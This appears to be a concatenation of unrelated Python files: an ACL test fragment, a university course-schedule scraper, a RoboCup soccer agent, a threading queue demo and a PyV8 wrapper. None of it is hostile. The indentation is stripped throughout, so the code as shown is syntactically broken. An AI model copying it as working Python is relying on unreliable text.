OrdersModel(id=6, customer_id=3, order_date='2021-01-01'),
OrdersModel(id=7, customer_id=2, order_date='2021-01-01')
]
articles = [
ArticlesModel(id=5, order_id=4, box_id=1, quantity=10),
ArticlesModel(id=6, order_id=5, box_id=4, quantity=5),
ArticlesModel(id=7, order_id=6, box_id=2, quantity=15),
ArticlesModel(id=8, order_id=7, box_id=2, quantity=100),
]
self.session.add_all(customers)
self.session.commit()
self.session.add_all(orders)
self.session.commit()
self.session.add_all(articles)
self.session.commit()
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='tradsjun1'))
result = self.session.query(CustomersModel.name, func.avg(ArticlesModel.quantity)).\
join(OrdersModel, CustomersModel.id == OrdersModel.customer_id).\
join(ArticlesModel, OrdersModel.id == ArticlesModel.order_id).\
group_by(CustomersModel.id).all()
self.assertEqual(result, [('Will Smith', 9), ('Tom Hanks', 20)])
ACL.unset_user()
ACL.set_user(ACL.Users.get(username='trads'))
result = self.session.query(CustomersModel.name, func.avg(ArticlesModel.quantity)).\
join(OrdersModel, CustomersModel.id == OrdersModel.customer_id).\
join(ArticlesModel, OrdersModel.id == ArticlesModel.order_id).\
group_by(CustomersModel.id).all()
self.assertEqual(result, [('Will Smith', 9), ('Tom Hanks', 60), ('Mel Gibson', 10)])
ACL.unset_user()
### DOCKER AND POSTGRES IMAGE REQUIRED ###
# for more see notes above setup.PostgresSetupMixin class
# if you want to skip this test case, simply comment it out (yes, there is probably better way of doing this ;) )
"""
class StandardConcurrentQueriesTestCase(PostgresSetupMixin, unittest.TestCase):
def test_parallel_selects(self):
# objects associated with root access level
root_level_objects = [
ExemplaryModel(id=1, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=2, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=3, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=4, string_field='some_string', integer_field=randrange(100000)),
]
self.session.add_all(root_level_objects)
self.session.commit()
import threading, logging, random
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format, level=logging.DEBUG,
datefmt="%H:%M:%S")
def thread_function(id):
logging.debug('Thread {0} started..'.format(id))
for _ in range(3):
ACL.set_user(ACL.Users.get(username='admin1'))
objects = self.session.query(ExemplaryModel).all()
logging.debug('thread = {0}, objects = {1}'.format(id, objects))
self.assertEqual(root_level_objects, objects)
ACL.unset_user()
logging.debug('Thread {0} finished..'.format(id))
threads = []
for i in range(5):
thr = threading.Thread(target=thread_function, args=(i,))
threads.append(thr)
thr.start()
for thr in threads:
thr.join()
"""
if __name__ == '__main__':
unittest.main()
|
cis_scraper.py
|
from lxml import etree as ET
from urllib.request import urlopen
from time import sleep
import re
import csv
from threading import Thread
# ---------------------- Fields --------------------------------------
fields = ["year",
"term",
"college",
"subject",
"subject_name",
"number",
"name",
"description",
"credit_hours",
"gen_ed",
"gen_ed_name",
"crn",
"section",
"section_info",
"section_notes",
"section_attributes",
"section_capp_area",
"section_co_request",
"section_special_approval",
"part_of_term",
"start_date",
"end_date",
"meeting",
"type",
"type_name",
"start_time",
"end_time",
"days",
"room",
"building",
"instructor"]
# ---------------------- Helper functions -----------------------------
def url_open(url):
retrycount = 0
s = None
while s is None:
try:
s = urlopen(url, timeout=50)
except:
print(url)
retrycount += 1
if retrycount > 6:
raise
sleep(2)
return s
def text_or_none(xml, find, pattern=None, attrib=None):
if xml.find(find) is not None:
text = xml.find(find)
if attrib is not None:
text = text.attrib[attrib]
else:
text = text.text
if pattern is not None:
match = re.match(pattern, text)
if match is not None:
return match.group(1) or None
return None
return text or None
return None
def build_url(*args):
url = "https://courses.illinois.edu/cisapp/explorer/schedule"
for arg in args:
url += "/" + str(arg)
return url + ".xml"
# ---------------------- Get Semester Data -----------------------------
def write_semester_csv(year, term):
row = {
"year": str(year),
"term": term.capitalize()
}
writer = csv.DictWriter(open("data/raw/{}-{}.csv".format(row["year"],row["term"]), "w+", newline='', encoding='utf-8'), fieldnames=fields)
writer.writeheader()
url = build_url(row["year"], row["term"].lower())
for subject in ET.parse(url_open(url)).iter("subject"):
row["subject"] = subject.attrib["id"]
url = build_url(row["year"], row["term"].lower(), row["subject"])
subject_info = ET.parse(url_open(url))
row["college"] = text_or_none(subject_info, "collegeCode")
row["subject_name"] = text_or_none(subject_info, "label")
print("Getting {} {} {}...".format(row["year"], row["term"], row["subject"]))
for course in subject_info.iter("course"):
row["number"] = course.attrib["id"]
url = build_url(row["year"], row["term"].lower(), row["subject"], row["number"])
course_info = ET.parse(url_open(url))
row["name"] = text_or_none(course_info, "label")
row["description"] = text_or_none(course_info, "description")
row["credit_hours"] = text_or_none(course_info, "creditHours")
row["section_attributes"] = text_or_none(course_info, "sectionDegreeAttributes")
for section in course_info.iter("section"):
row["crn"] = section.attrib["id"]
url = build_url(row["year"], row["term"].lower(), row["subject"], row["number"], row["crn"])
section_info = ET.parse(url_open(url))
row["section"] = text_or_none(section_info, "sectionNumber")
row["section_info"] = text_or_none(section_info, "sectionText")
row["section_notes"] = text_or_none(section_info, "sectionNotes")
row["section_capp_area"] = text_or_none(section_info, "sectionCappArea")
row["section_attributes"] = row["section_attributes"] or text_or_none(section_info, "sectionDegreeAttributes")
row["section_co_request"] = text_or_none(section_info, "sectionCoRequest")
row["section_special_approval"] = text_or_none(section_info, "specialApproval")
row["part_of_term"] = text_or_none(section_info, "partOfTerm")
row["start_date"] = text_or_none(section_info, "startDate")
row["end_date"] = text_or_none(section_info, "endDate")
for meeting in section_info.iter("meeting"):
row["meeting"] = meeting.attrib["id"]
row["type"] = text_or_none(meeting, "type", attrib="code")
row["type_name"] = text_or_none(meeting, "type")
row["days"] = text_or_none(meeting, "daysOfTheWeek")
row["room"] = text_or_none(meeting, "roomNumber")
row["start_time"] = text_or_none(meeting, "start")
row["end_time"] = text_or_none(meeting, "end")
row["building"] = text_or_none(meeting, "buildingName")
instructors = meeting.iter("instructor")
if next(meeting.iter("instructor"),None) is None:
instructors = [None]
for instructor in instructors:
row["instructor"] = instructor if instructor is None else instructor.text
categories = course_info.find("genEdCategories")
if categories is not None:
for cat in categories.iter("category"):
for genEd in cat.find("{http://rest.cis.illinois.edu}genEdAttributes").iter("genEdAttribute"):
row["gen_ed"] = genEd.attrib["code"]
row["gen_ed_name"] = genEd.text
writer.writerow(row)
else:
row["gen_ed"] = None
writer.writerow(row)
# Get past semesters
if __name__ == "__main__":
threads = []
for year in ET.parse(url_open("https://courses.illinois.edu/cisapp/explorer/schedule.xml")).iter("calendarYear"):
for term in ET.parse(url_open(year.attrib["href"])).iter("term"):
thread = Thread(target=write_semester_csv, args=(year.text, term.text[:-5]))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
|
agent.py
|
#!/usr/bin/env python
import threading
import time
import random
import sock
import sp_exceptions
import handler
from world_model import WorldModel
class Agent:
def __init__(self):
# whether we're connected to a server yet or not
self.__connected = False
# set all variables and important objects to appropriate values for
# pre-connect state.
# the socket used to communicate with the server
self.__sock = None
# models and the message handler for parsing and storing information
self.wm = None
self.msg_handler = None
# parse thread and control variable
self.__parsing = False
self.__msg_thread = None
self.__thinking = False # think thread and control variable
self.__think_thread = None
# whether we should run the think method
self.__should_think_on_data = False
# whether we should send commands
self.__send_commands = False
# adding goal post markers
self.enemy_goal_pos = None
self.own_goal_pos = None
def connect(self, host, port, teamname, version=11):
"""
Gives us a connection to the server as one player on a team. This
immediately connects the agent to the server and starts receiving and
parsing the information it sends.
"""
# if already connected, raise an error since user may have wanted to
# connect again to a different server.
if self.__connected:
msg = "Cannot connect while already connected, disconnect first."
raise sp_exceptions.AgentConnectionStateError(msg)
# the pipe through which all of our communication takes place
self.__sock = sock.Socket(host, port)
# our models of the world and our body
self.wm = WorldModel(handler.ActionHandler(self.__sock))
# set the team name of the world model to the given name
self.wm.teamname = teamname
# handles all messages received from the server
self.msg_handler = handler.MessageHandler(self.wm)
# set up our threaded message receiving system
self.__parsing = True # tell thread that we're currently running
self.__msg_thread = threading.Thread(target=self.__message_loop,
name="message_loop")
self.__msg_thread.daemon = True # dies when parent thread dies
# start processing received messages. this will catch the initial server
# response and all subsequent communication.
self.__msg_thread.start()
# send the init message and allow the message handler to handle further
# responses.
init_address = self.__sock.address
init_msg = "(init %s (version %d))"
self.__sock.send(init_msg % (teamname, version))
# wait until the socket receives a response from the server and gets its
# assigned port.
while self.__sock.address == init_address:
time.sleep(0.0001)
# create our thinking thread. this will perform the actions necessary
# to play a game of robo-soccer.
self.__thinking = False
self.__think_thread = threading.Thread(target=self.__think_loop,
name="think_loop")
self.__think_thread.daemon = True
# set connected state. done last to prevent state inconsistency if
# something goes wrong beforehand.
self.__connected = True
def play(self):
"""
Kicks off the thread that does the agent's thinking, allowing it to play
during the game. Throws an exception if called while the agent is
already playing.
"""
# ensure we're connected before doing anything
if not self.__connected:
msg = "Must be connected to a server to begin play."
raise sp_exceptions.AgentConnectionStateError(msg)
# throw exception if called while thread is already running
if self.__thinking:
raise sp_exceptions.AgentAlreadyPlayingError(
"Agent is already playing.")
# run the method that sets up the agent's persistant variables
self.setup_environment()
# tell the thread that it should be running, then start it
self.__thinking = True
self.__should_think_on_data = True
self.__think_thread.start()
def disconnect(self):
"""
Tell the loop threads to stop and signal the server that we're
disconnecting, then join the loop threads and destroy all our inner
methods.
Since the message loop thread can conceiveably block indefinitely while
waiting for the server to respond, we only allow it (and the think loop
for good measure) a short time to finish before simply giving up.
Once an agent has been disconnected, it is 'dead' and cannot be used
again. All of its methods get replaced by a method that raises an
exception every time it is called.
"""
# don't do anything if not connected
if not self.__connected:
return
# tell the loops to terminate
self.__parsing = False
self.__thinking = False
# tell the server that we're quitting
self.__sock.send("(bye)")
# tell our threads to join, but only wait breifly for them to do so.
# don't join them if they haven't been started (this can happen if
# disconnect is called very quickly after connect).
if self.__msg_thread.is_alive():
self.__msg_thread.join(0.01)
if self.__think_thread.is_alive():
self.__think_thread.join(0.01)
# reset all standard variables in this object. self.__connected gets
# reset here, along with all other non-user defined internal variables.
Agent.__init__(self)
def __message_loop(self):
"""
Handles messages received from the server.
This SHOULD NOT be called externally, since it's used as a threaded loop
internally by this object. Calling it externally is a BAD THING!
"""
# loop until we're told to stop
while self.__parsing:
# receive message data from the server and pass it along to the
# world model as-is. the world model parses it and stores it within
# itself for perusal at our leisure.
raw_msg = self.__sock.recv()
msg_type = self.msg_handler.handle_message(raw_msg)
# we send commands all at once every cycle, ie. whenever a
# 'sense_body' command is received
if msg_type == handler.ActionHandler.CommandType.SENSE_BODY:
self.__send_commands = True
# flag new data as needing the think loop's attention
self.__should_think_on_data = True
def __think_loop(self):
"""
Performs world model analysis and sends appropriate commands to the
server to allow the agent to participate in the current game.
Like the message loop, this SHOULD NOT be called externally. Use the
play method to start play, and the disconnect method to end it.
"""
while self.__thinking:
# tell the ActionHandler to send its enqueued messages if it is time
if self.__send_commands:
self.__send_commands = False
self.wm.ah.send_commands()
# only think if new data has arrived
if self.__should_think_on_data:
# flag that data has been processed. this shouldn't be a race
# condition, since the only change would be to make it True
# before changing it to False again, and we're already going to
# process data, so it doesn't make any difference.
self.__should_think_on_data = False
# performs the actions necessary for the agent to play soccer
self.think()
else:
# prevent from burning up all the cpu time while waiting for data
time.sleep(0.0001)
def setup_environment(self):
"""
Called before the think loop starts, this allows the user to store any
variables/objects they'll want access to across subsequent calls to the
think method.
"""
self.in_kick_off_formation = False
def think(self):
"""
Performs a single step of thinking for our agent. Gets called on every
iteration of our think loop.
"""
# DEBUG: tells us if a thread dies
if not self.__think_thread.is_alive() or not self.__msg_thread.is_alive():
raise Exception("A thread died.")
# take places on the field by uniform number
if not self.in_kick_off_formation:
# used to flip x coords for other side
side_mod = 1
if self.wm.side == WorldModel.SIDE_R:
side_mod = -1
if self.wm.uniform_number == 1:
self.wm.teleport_to_point((-5 * side_mod, 30))
elif self.wm.uniform_number == 2:
self.wm.teleport_to_point((-40 * side_mod, 15))
elif self.wm.uniform_number == 3:
self.wm.teleport_to_point((-40 * side_mod, 00))
elif self.wm.uniform_number == 4:
self.wm.teleport_to_point((-40 * side_mod, -15))
elif self.wm.uniform_number == 5:
self.wm.teleport_to_point((-5 * side_mod, -30))
elif self.wm.uniform_number == 6:
self.wm.teleport_to_point((-20 * side_mod, 20))
elif self.wm.uniform_number == 7:
self.wm.teleport_to_point((-20 * side_mod, 0))
elif self.wm.uniform_number == 8:
self.wm.teleport_to_point((-20 * side_mod, -20))
elif self.wm.uniform_number == 9:
self.wm.teleport_to_point((-10 * side_mod, 0))
elif self.wm.uniform_number == 10:
self.wm.teleport_to_point((-10 * side_mod, 20))
elif self.wm.uniform_number == 11:
self.wm.teleport_to_point((-10 * side_mod, -20))
self.in_kick_off_formation = True
return
# determine the enemy goal position
goal_pos = None
if self.wm.side == WorldModel.SIDE_R:
goal_pos = (-55, 0)
else:
goal_pos = (55, 0)
# kick off!
if self.wm.is_before_kick_off():
# player 9 takes the kick off
if self.wm.uniform_number == 9:
if self.wm.is_ball_kickable():
# kick with 100% extra effort at enemy goal
self.wm.kick_to(goal_pos, 1.0)
else:
# move towards ball
if self.wm.ball is not None:
if (self.wm.ball.direction is not None and
-7 <= self.wm.ball.direction <= 7):
self.wm.ah.dash(50)
else:
self.wm.turn_body_to_point((0, 0))
# turn to ball if we can see it, else face the enemy goal
if self.wm.ball is not None:
self.wm.turn_neck_to_object(self.wm.ball)
return
# attack!
else:
# find the ball
if self.wm.ball is None or self.wm.ball.direction is None:
self.wm.ah.turn(30)
return
# kick it at the enemy goal
if self.wm.is_ball_kickable():
self.wm.kick_to(goal_pos, 1.0)
return
else:
# move towards ball
if -7 <= self.wm.ball.direction <= 7:
self.wm.ah.dash(65)
else:
# face ball
self.wm.ah.turn(self.wm.ball.direction / 2)
return
# if __name__ == "__main__":
# import sys
# import multiprocessing as mp
# # enforce corrent number of arguments, print help otherwise
# if len(sys.argv) < 3:
# print "args: ./agent.py <team_name> <num_players>"
# sys.exit()
# def spawn_agent(team_name):
# """
# Used to run an agent in a seperate physical process.
# """
# a = Agent()
# a.connect("localhost", 6000, team_name)
# a.play()
# # we wait until we're killed
# while 1:
# # we sleep for a good while since we can only exit if terminated.
# time.sleep(1)
# # spawn all agents as seperate processes for maximum processing efficiency
# agentthreads = []
# for agent in xrange(min(11, int(sys.argv[2]))):
# print " Spawning agent %d..." % agent
# at = mp.Process(target=spawn_agent, args=(sys.argv[1],))
# at.daemon = True
# at.start()
# agentthreads.append(at)
# print "Spawned %d agents." % len(agentthreads)
# print
# print "Playing soccer..."
# # wait until killed to terminate agent processes
# try:
# while 1:
# time.sleep(0.05)
# except KeyboardInterrupt:
# print
# print "Killing agent threads..."
# # terminate all agent processes
# count = 0
# for at in agentthreads:
# print " Terminating agent %d..." % count
# at.terminate()
# count += 1
# print "Killed %d agent threads." % (count - 1)
# print
# print "Exiting."
# sys.exit()
|
demo_threading_queue.py
|
from queue import Queue
from random import randint
from threading import Thread
from time import sleep
'''
Python 3.X threading 与 Queue 结合演示 Demo
经典的并发生产消费者模型
'''
class TestQueue(object):
def __init__(self):
self.queue = Queue(2)
def writer(self):
print('Producter start write to queue.')
self.queue.put('key', block=1)
print('Producter write to queue end. size is:'+str(self.queue.qsize()))
def reader(self):
value = self.queue.get(block=1)
print('Consumer read from queue end. size is:'+str(self.queue.qsize()))
def producter(self):
for i in range(5):
self.writer()
sleep(randint(0, 3))
def consumer(self):
for i in range(5):
self.reader()
sleep(randint(2, 4))
def go(self):
print('TestQueue Start!')
threads = []
functions = [self.consumer, self.producter]
for func in functions:
thread = Thread(target=func, name=func.__name__)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
print('TestQueue Done!')
if __name__ == '__main__':
TestQueue().go()
|
PyV8.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys, os, re
import logging
import collections
is_py3k = sys.version_info[0] > 2
if is_py3k:
import _thread as thread
from io import StringIO
str = str
raw_input = input
else:
import _thread
try:
from io import StringIO
except ImportError:
from io import StringIO
try:
import json
except ImportError:
import simplejson as json
import _PyV8
__author__ = 'Flier Lu <flier.lu@gmail.com>'
__version__ = '1.0'
__all__ = ["ReadOnly", "DontEnum", "DontDelete", "Internal",
"JSError", "JSObject", "JSArray", "JSFunction",
"JSClass", "JSEngine", "JSContext",
"JSObjectSpace", "JSAllocationAction",
"JSStackTrace", "JSStackFrame", "profiler",
"JSExtension", "JSLocker", "JSUnlocker", "AST"]
class JSAttribute(object):
def __init__(self, name):
self.name = name
def __call__(self, func):
setattr(func, "__%s__" % self.name, True)
return func
ReadOnly = JSAttribute(name='readonly')
DontEnum = JSAttribute(name='dontenum')
DontDelete = JSAttribute(name='dontdel')
Internal = JSAttribute(name='internal')
class JSError(Exception):
def __init__(self, impl):
Exception.__init__(self)
self._impl = impl
def __str__(self):
return str(self._impl)
def __unicode__(self, *args, **kwargs):
return str(self._impl)
def __getattribute__(self, attr):
impl = super(JSError, self).__getattribute__("_impl")
try:
return getattr(impl, attr)
except AttributeError:
return super(JSError, self).__getattribute__(attr)
RE_FRAME = re.compile(r"\s+at\s(?:new\s)?(?P<func>.+)\s\((?P<file>[^:]+):?(?P<row>\d+)?:?(?P<col>\d+)?\)")
RE_FUNC = re.compile(r"\s+at\s(?:new\s)?(?P<func>.+)\s\((?P<file>[^\)]+)\)")
RE_FILE = re.compile(r"\s+at\s(?P<file>[^:]+):?(?P<row>\d+)?:?(?P<col>\d+)?")
@staticmethod
def parse_stack(value):
stack = []
def int_or_nul(value):
return int(value) if value else None
for line in value.split('\n')[1:]:
m = JSError.RE_FRAME.match(line)
if m:
stack.append((m.group('func'), m.group('file'), int_or_nul(m.group('row')), int_or_nul(m.group('col'))))
continue
m = JSError.RE_FUNC.match(line)
if m:
stack.append((m.group('func'), m.group('file'), None, None))
continue
m = JSError.RE_FILE.match(line)
if m:
stack.append((None, m.group('file'), int_or_nul(m.group('row')), int_or_nul(m.group('col'))))
continue
assert line
return stack
@property
def frames(self):
return self.parse_stack(self.stackTrace)
_PyV8._JSError._jsclass = JSError
JSObject = _PyV8.JSObject
JSArray = _PyV8.JSArray
JSFunction = _PyV8.JSFunction
# contribute by e.generalov
JS_ESCAPABLE = re.compile(r'([^\x00-\x7f])')
HAS_UTF8 = re.compile(r'[\x80-\xff]')
def _js_escape_unicode_re_callack(match):
n = ord(match.group(0))
if n < 0x10000:
return '\\u%04x' % (n,)
else:
# surrogate pair
n -= 0x10000
s1 = 0xd800 | ((n >> 10) & 0x3ff)
s2 = 0xdc00 | (n & 0x3ff)
return '\\u%04x\\u%04x' % (s1, s2)
def js_escape_unicode(text):
"""Return an ASCII-only representation of a JavaScript string"""
if isinstance(text, str):
if HAS_UTF8.search(text) is None:
return text
text = text.decode('UTF-8')
return str(JS_ESCAPABLE.sub(_js_escape_unicode_re_callack, text))
class JSExtension(_PyV8.JSExtension):
def __init__(self, name, source, callback=None, dependencies=[], register=True):
_PyV8.JSExtension.__init__(self, js_escape_unicode(name), js_escape_unicode(source), callback, dependencies, register)
def func_apply(self, thisArg, argArray=[]):
if isinstance(thisArg, JSObject):
return self.invoke(thisArg, argArray)
this = JSContext.current.eval("(%s)" % json.dumps(thisArg))
return self.invoke(this, argArray)
JSFunction.apply = func_apply
class JSLocker(_PyV8.JSLocker):
def __enter__(self):
self.enter()
if JSContext.entered:
self.leave()
raise RuntimeError("Lock should be acquired before enter the context")
return self
def __exit__(self, exc_type, exc_value, traceback):
if JSContext.entered:
self.leave()
raise RuntimeError("Lock should be released after leave the context")
self.leave()
if is_py3k:
def __bool__(self):
return self.entered()
else:
def __nonzero__(self):
return self.entered()
class JSUnlocker(_PyV8.JSUnlocker):
def __enter__(self):
self.enter()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.leave()
if is_py3k:
def __bool__(self):
return self.entered()
else:
def __nonzero__(self):
return self.entered()
class JSClass(object):
__properties__ = {}
__watchpoints__ = {}
def __getattr__(self, name):
if name == 'constructor':
return JSClassConstructor(self.__class__)
if name == 'prototype':
return JSClassPrototype(self.__class__)
prop = self.__dict__.setdefault('__properties__', {}).get(name, None)
if prop and isinstance(prop[0], collections.Callable):
return prop[0]()
raise AttributeError(name)
def __setattr__(self, name, value):
prop = self.__dict__.setdefault('__properties__', {}).get(name, None)
if prop and isinstance(prop[1], collections.Callable):
return prop[1](value)
return object.__setattr__(self, name, value)
def toString(self):
"Returns a string representation of an object."
return "[object %s]" % self.__class__.__name__
def toLocaleString(self):
"Returns a value as a string value appropriate to the host environment's current locale."
return self.toString()
def valueOf(self):
"Returns the primitive value of the specified object."
return self
def hasOwnProperty(self, name):
"Returns a Boolean value indicating whether an object has a property with the specified name."
return hasattr(self, name)
def isPrototypeOf(self, obj):
"Returns a Boolean value indicating whether an object exists in the prototype chain of another object."
raise NotImplementedError()
def __defineGetter__(self, name, getter):
"Binds an object's property to a function to be called when that property is looked up."
self.__properties__[name] = (getter, self.__lookupSetter__(name))
def __lookupGetter__(self, name):
"Return the function bound as a getter to the specified property."
return self.__properties__.get(name, (None, None))[0]
def __defineSetter__(self, name, setter):
"Binds an object's property to a function to be called when an attempt is made to set that property."
self.__properties__[name] = (self.__lookupGetter__(name), setter)
def __lookupSetter__(self, name):
"Return the function bound as a setter to the specified property."
return self.__properties__.get(name, (None, None))[1]
def watch(self, prop, handler):
"Watches for a property to be assigned a value and runs a function when that occurs."
self.__watchpoints__[prop] = handler
def unwatch(self, prop):
"Removes a watchpoint set with the watch method."
del self.__watchpoints__[prop]
class JSClassConstructor(JSClass):
def __init__(self, cls):
self.cls = cls
@property
def name(self):
return self.cls.__name__
def toString(self):
return "function %s() {\n [native code]\n}" % self.name
def __call__(self, *args, **kwds):
return self.cls(*args, **kwds)
class JSClassPrototype(JSClass):
def __init__(self, cls):
self.cls = cls
@property
def constructor(self):
return JSClassConstructor(self.cls)
@property
def name(self):
return self.cls.__name__
class JSDebugProtocol(object):
"""
Support the V8 debugger JSON based protocol.
<http://code.google.com/p/v8/wiki/DebuggerProtocol>
"""
class Packet(object):
REQUEST = 'request'
RESPONSE = 'response'
EVENT = 'event'
def __init__(self, payload):
self.data = json.loads(payload) if type(payload) in [str, str] else payload
@property
def seq(self):
return self.data['seq']
@property
def type(self):
return self.data['type']
class Request(Packet):
@property
def cmd(self):
return self.data['command']
@property
def args(self):
return self.data['args']
class Response(Packet):
@property
def request_seq(self):
return self.data['request_seq']
@property
def cmd(self):
return self.data['command']
@property
def body(self):
return self.data['body']
@property
def running(self):
return self.data['running']
@property
def success(self):
return self.data['success']
@property
def message(self):
return self.data['message']
class Event(Packet):
@property
def event(self):
return self.data['event']
@property
def body(self):
return self.data['body']
def __init__(self):
self.seq = 0
def nextSeq(self):
seq = self.seq
self.seq += 1
return seq
def parsePacket(self, payload):
obj = json.loads(payload)
return JSDebugProtocol.Event(obj) if obj['type'] == 'event' else JSDebugProtocol.Response(obj)
class JSDebugEvent(_PyV8.JSDebugEvent):
class FrameData(object):
def __init__(self, frame, count, name, value):
self.frame = frame
self.count = count
self.name = name
self.value = value
def __len__(self):
return self.count(self.frame)
def __iter__(self):
for i in range(self.count(self.frame)):
yield (self.name(self.frame, i), self.value(self.frame, i))
class Frame(object):
def __init__(self, frame):
self.frame = frame
@property
def index(self):
return int(self.frame.index())
@property
def function(self):
return self.frame.func()
@property
def receiver(self):
return self.frame.receiver()
@property
def isConstructCall(self):
return bool(self.frame.isConstructCall())
@property
def isDebuggerFrame(self):
return bool(self.frame.isDebuggerFrame())
@property
def argumentCount(self):
return int(self.frame.argumentCount())
def argumentName(self, idx):
return str(self.frame.argumentName(idx))
def argumentValue(self, idx):
return self.frame.argumentValue(idx)
@property
def arguments(self):
return JSDebugEvent.FrameData(self, self.argumentCount, self.argumentName, self.argumentValue)
def localCount(self, idx):
return int(self.frame.localCount())
def localName(self, idx):
return str(self.frame.localName(idx))
def localValue(self, idx):
return self.frame.localValue(idx)
@property
def locals(self):
return JSDebugEvent.FrameData(self, self.localCount, self.localName, self.localValue)
@property
def sourcePosition(self):
return self.frame.sourcePosition()
@property
def sourceLine(self):
return int(self.frame.sourceLine())
@property
def sourceColumn(self):
return int(self.frame.sourceColumn())
@property
def sourceLineText(self):
return str(self.frame.sourceLineText())
def evaluate(self, source, disable_break = True):
return self.frame.evaluate(source, disable_break)
@property
def invocationText(self):
return str(self.frame.invocationText())
@property
def sourceAndPositionText(self):
return str(self.frame.sourceAndPositionText())
@property
def localsText(self):
return str(self.frame.localsText())
def __str__(self):
return str(self.frame.toText())
class Frames(object):
def __init__(self, state):
self.state = state
def __len__(self):
return self.state.frameCount
def __iter__(self):
for i in range(self.state.frameCount):
yield self.state.frame(i)
class State(object):
def __init__(self, state):
self.state = state
@property
def frameCount(self):
return int(self.state.frameCount())
def frame(self, idx = None):
return JSDebugEvent.Frame(self.state.frame(idx))
@property
def selectedFrame(self):
return int(self.state.selectedFrame())
@property
def frames(self):
return JSDebugEvent.Frames(self)
def __repr__(self):
s = StringIO()
try:
for frame in self.frames:
s.write(str(frame))
return s.getvalue()
finally:
s.close()
class DebugEvent(object):
pass
class StateEvent(DebugEvent):
__state = None
@property
def state(self):
if not self.__state:
self.__state = JSDebugEvent.State(self.event.executionState())
return self.__state
class BreakEvent(StateEvent):
type = _PyV8.JSDebugEvent.Break
def __init__(self, event):
self.event = event
class ExceptionEvent(StateEvent):
type = _PyV8.JSDebugEvent.Exception
def __init__(self, event):
self.event = event
class NewFunctionEvent(DebugEvent):
type = _PyV8.JSDebugEvent.NewFunction
def __init__(self, event):
self.event = event
class Script(object):
def __init__(self, script):
self.script = script
@property
def source(self):
return self.script.source()
@property
def id(self):
return self.script.id()
@property
def name(self):
return self.script.name()
@property
def lineOffset(self):
return self.script.lineOffset()
@property
def lineCount(self):
return self.script.lineCount()
@property
def columnOffset(self):
return self.script.columnOffset()
@property
def type(self):
return self.script.type()
def __repr__(self):
return "<%s script %s @ %d:%d> : '%s'" % (self.type, self.name,
self.lineOffset, self.columnOffset,
self.source)
class CompileEvent(StateEvent):
def __init__(self, event):
self.event = event
@property
def script(self):
if not hasattr(self, "_script"):
setattr(self, "_script", JSDebugEvent.Script(self.event.script()))
return self._script
def __str__(self):
return str(self.script)
class BeforeCompileEvent(CompileEvent):
type = _PyV8.JSDebugEvent.BeforeCompile
def __init__(self, event):
JSDebugEvent.CompileEvent.__init__(self, event)
def __repr__(self):
return "before compile script: %s\n%s" % (repr(self.script), repr(self.state))
class AfterCompileEvent(CompileEvent):
type = _PyV8.JSDebugEvent.AfterCompile
def __init__(self, event):
JSDebugEvent.CompileEvent.__init__(self, event)
def __repr__(self):
return "after compile script: %s\n%s" % (repr(self.script), repr(self.state))
onMessage = None
onBreak = None
onException = None
onNewFunction = None
onBeforeCompile = None
onAfterCompile = None
class JSDebugger(JSDebugProtocol, JSDebugEvent):
def __init__(self):
JSDebugProtocol.__init__(self)
JSDebugEvent.__init__(self)
def __enter__(self):
self.enabled = True
return self
def __exit__(self, exc_type, exc_value, traceback):
self.enabled = False
@property
def context(self):
if not hasattr(self, '_context'):
self._context = JSContext(ctxt=_PyV8.debug().context)
return self._context
def isEnabled(self):
return _PyV8.debug().enabled
def setEnabled(self, enable):
dbg = _PyV8.debug()
if enable:
dbg.onDebugEvent = self.onDebugEvent
dbg.onDebugMessage = self.onDebugMessage
dbg.onDispatchDebugMessages = self.onDispatchDebugMessages
else:
dbg.onDebugEvent = None
dbg.onDebugMessage = None
dbg.onDispatchDebugMessages = None
dbg.enabled = enable
enabled = property(isEnabled, setEnabled)
def onDebugMessage(self, msg, data):
if self.onMessage:
self.onMessage(json.loads(msg))
def onDebugEvent(self, type, state, evt):
if type == JSDebugEvent.Break:
if self.onBreak: self.onBreak(JSDebugEvent.BreakEvent(evt))
elif type == JSDebugEvent.Exception:
if self.onException: self.onException(JSDebugEvent.ExceptionEvent(evt))
elif type == JSDebugEvent.NewFunction:
if self.onNewFunction: self.onNewFunction(JSDebugEvent.NewFunctionEvent(evt))
elif type == JSDebugEvent.BeforeCompile:
if self.onBeforeCompile: self.onBeforeCompile(JSDebugEvent.BeforeCompileEvent(evt))
elif type == JSDebugEvent.AfterCompile:
if self.onAfterCompile: self.onAfterCompile(JSDebugEvent.AfterCompileEvent(evt))
def onDispatchDebugMessages(self):
return True
def debugBreak(self):
_PyV8.debug().debugBreak()
def debugBreakForCommand(self):
_PyV8.debug().debugBreakForCommand()
def cancelDebugBreak(self):
_PyV8.debug().cancelDebugBreak()
def processDebugMessages(self):
_PyV8.debug().processDebugMessages()
def sendCommand(self, cmd, *args, **kwds):
request = json.dumps({
'seq': self.nextSeq(),
'type': 'request',
'command': cmd,
'arguments': kwds
})
_PyV8.debug().sendCommand(request)
return request
def debugContinue(self, action='next', steps=1):
return self.sendCommand('continue', stepaction=action)
def stepNext(self, steps=1):
"""Step to the next statement in the current function."""
return self.debugContinue(action='next', steps=steps)
def stepIn(self, steps=1):
"""Step into new functions invoked or the next statement in the current function."""
return self.debugContinue(action='in', steps=steps)
def stepOut(self, steps=1):
"""Step out of the current function."""
return self.debugContinue(action='out', steps=steps)
def stepMin(self, steps=1):
"""Perform a minimum step in the current function."""
return self.debugContinue(action='out', steps=steps)
class JSProfiler(_PyV8.JSProfiler):
@property
def logs(self):
pos = 0
while True:
size, buf = self.getLogLines(pos)
if size == 0:
break
for line in buf.split('\n'):
yield line
pos += size
profiler = JSProfiler()
JSObjectSpace = _PyV8.JSObjectSpace
JSAllocationAction = _PyV8.JSAllocationAction
class JSEngine(_PyV8.JSEngine):
def __init__(self):
_PyV8.JSEngine.__init__(self)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
del self
JSScript = _PyV8.JSScript
JSStackTrace = _PyV8.JSStackTrace
